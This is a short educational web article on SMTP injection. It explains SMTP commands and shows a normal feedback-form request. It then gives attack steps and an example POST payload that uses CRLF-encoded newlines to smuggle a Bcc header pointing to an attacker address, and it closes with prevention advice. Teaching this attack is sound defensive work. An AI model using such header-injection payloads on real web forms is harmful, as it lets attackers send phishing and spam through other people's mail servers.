Open In App

SMTP Injection

Last Updated : 11 Oct, 2022
Improve
Improve
Like Article
Like
Save
Share
Report

SMTP stands for Simple Mail Transfer Protocol. It is an application layer protocol that handles the sending, receiving, and forwarding of emails on the server. A client that wants to send an email first opens a TCP connection to the SMTP server and sends an email over that connection.

SMTP Injection

 

Example:

Suppose there is an application requesting the following form to submit feedback:

POST feedback.php HTTP/1.1
Host: geeksforgeeks.com
Content-Length: 70
From=gfglover@gmail.com & Subject=GFG+Site+feedback
& Message=love+geeksforgeeks+3000

After submitting the input, the web application executes the SMTP program using the following command:

  • MAIL – Used to initiate sender.
  • RCPT – This command includes all email addresses of recipients.
  • DATA – This contains email data.
MAIL FROM:gfglover@gmail.com

RCPT TO:feedback@geeksforgeeks.com

DATA
From: gfglover@gmail.com
To:feedback@geeksforgeeks.com
Subject:GFG Site feedback
love geeksforgeeks 3000
.

SMTP injection is an attack technique where hackers exploit an application’s mail and web servers, and if the input is not carefully protected, then hackers can send emails to targeted users. Hackers do this to send phishing emails and any type of malicious attachments.

Steps Performed to perform SMTP Injection attack:

  • Step 1: Enter details in the feedback form as shown in the SMTP example above.
  • Step 2:  Use any interception tool such as Burp Suite to intercept the request you make.
  • Step 3: Inject malicious input into this capture request.
  • step 4: Now send the infected email request as shown below.
POST feedback.php HTTP/1.1
Host: geeksforgeeks.com
Content-Length: 70
From=gfglover@gmail.com%0d%0a 
bcc:hackername%40hacker.com & Subject=Site+
feedback & Message=love+geeksforgeeks+3000

Preventive Measure:

  • Use input validation techniques such as whitelisting to filter input.
  • Newline characters are not allowed or rejected.
  • There are many email libraries that can be used to automatically defend against this type of attack.
  • Never trust user input. So test all possible inputs.

Like Article
Suggest improvement
Next
SMTP Enumeration
Share your thoughts in the comments

Similar Reads

What is SMTP Header Injection?
Testing For IMAP SMTP Injection
SMTP Enumeration
What are Injection Flaws?
How to Protect Against SQL Injection Attacks?
What is CSV Injection?
SQL Injection Cheat Sheet
Types of SQL Injection (SQLi)
How a Connection String Injection Attack is Performed?
What is SQL Injection UNION Attacks?
author
ishukatiyar16
Article Tags :
We use cookies to ensure you have the best browsing experience on our website. By using our site, you acknowledge that you have read and understood our Cookie Policy & Privacy Policy
Lightbox